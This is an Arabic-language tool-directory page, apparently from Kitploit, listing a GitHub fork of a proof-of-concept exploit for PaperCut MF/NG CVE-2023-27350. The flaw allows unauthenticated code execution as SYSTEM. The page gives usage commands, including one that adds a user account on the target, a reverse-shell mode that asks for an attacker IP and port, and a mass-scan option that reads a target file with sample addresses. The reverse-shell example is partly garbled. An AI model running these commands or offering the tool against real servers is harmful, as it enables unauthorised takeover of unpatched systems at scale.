Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/adhikara13/cve-2023-27350
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

استغلال لـ Papercut CVE-2023-27350. [+] صدفة عكسية [+] فحص جماعي

عرض المستودع
93منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27350 إثبات مفهوم الاستغلال

هذا هو استغلال إثبات المفهوم (POC) لـ CVE-2023-27350، وهي ثغرة أمنية موجودة في PaperCut MF/NG تسمح لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية بصلاحيات SYSTEM.

المتطلبات

قبل استخدام هذا الاستغلال، تأكد من تثبيت المكتبات التالية:

root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

الخيارات

  • -u، --url: عنوان URL لتطبيق PaperCut MF/NG المستهدف (على سبيل المثال، http://target-ip:9191).
  • -c، --command: الأمر الذي سيتم تنفيذه على النظام المستهدف.
  • --reverse-shell: استخدم حمولة قشرة عكسية لتنفيذ الأوامر على النظام المستهدف.
  • -f، --file: فحص عدة أهداف من ملف (على سبيل المثال، file.txt).

مثال

تنفيذ أمر

لتنفيذ أمر على النظام المستهدف، استخدم الخيار -c:

root@kitploit:~
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

القشرة العكسية

لاستخدام حمولة قشرة عكسية لتنفيذ الأوامر على النظام المستهدف، استخدم الخيار --reverse-shell. سيُطلب منك إدخال عنوان IP ورقم المنفذ:

root@kitploit:~
: : <> : <>

الفحص الجماعي

لفحص عدة أهداف من ملف، استخدم الخيار -f. يجب أن يكون تنسيق الملف ip_address:port:

root@kitploit:~
python CVE-2023-27350.py -f file.txt

تنسيق file.txt

عند استخدام خيار الفحص الجماعي مع إدخال file.txt، تأكد من أن محتويات الملف منسقة بشكل صحيح.

يجب أن يحتوي كل سطر في الملف على عنوان IP ورقم منفذ الهدف، مفصولين بنقطتين رأسيتين :. على سبيل المثال:

root@kitploit:~
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

تأكد من عدم وجود مسافات أو أحرف إضافية بين عنوان IP والنقطتين الرأسيتين ورقم المنفذ. كذلك، تأكد من أن كل سطر يحتوي على عنوان IP واحد ورقم منفذ واحد فقط.

الاعتمادات

هذه نسخة متفرعة من مستودع horizon3ai/CVE-2023-27350. تعود جميع الاعتمادات في الاستغلال الأصلي إلى المؤلفين.

تنزيل الأداة
python
exploit
.py
-u
http
//target-ip:9191 --reverse-shell
Enter
your
IP
address
attacker-ip
Enter
your
port
number
port